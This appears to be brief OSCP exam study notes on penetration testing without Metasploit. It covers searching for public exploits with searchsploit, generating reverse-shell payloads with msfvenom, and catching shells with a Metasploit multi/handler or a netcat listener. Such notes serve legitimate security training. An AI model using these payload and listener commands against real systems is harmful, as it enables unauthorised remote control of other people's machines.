OSCP Notes
How to hack without Metasploit

1. Finding Exploits

Search for exploits

```shell
searchsploit keyword1 keyword2 keyword3 ...
```

Copy an exploit into the current directory

```shell
searchsploit -m [exploit database id]
```

If searchsploit fails to find any juicy exploits, try Google. If Google fails, well, there’s probably not a public exploit. TRY HARDER!

2. Customising Payloads

Payloads are generated to open a Meterpreter session or a reverse shell, so that you can take control of the victim box.

MsfVenom

```shell
msfvenom -p [payload] -f [format] LHOST=[your ip] LPORT=[your listener port]
```

Payload naming:
    staged - windows/shell/reverse_tcp
    unstaged - windows/shell_reverse_tcp

Other options:
    -e to choose an encoder
    -b allows you to set bad characters

List all payloads for msfvenom

```shell
msfvenom --list payloads
```

3. Privilege Escalation

    Linux
    Windows

4. Catching reverse shells

Metasploit multi/handler listener (required for a staged payload)

```shell
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
```
Netcat listener (unstaged payload only: a staged payload expects the Metasploit handler to send its second stage, so plain netcat will not give a usable shell)

```shell
# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...
```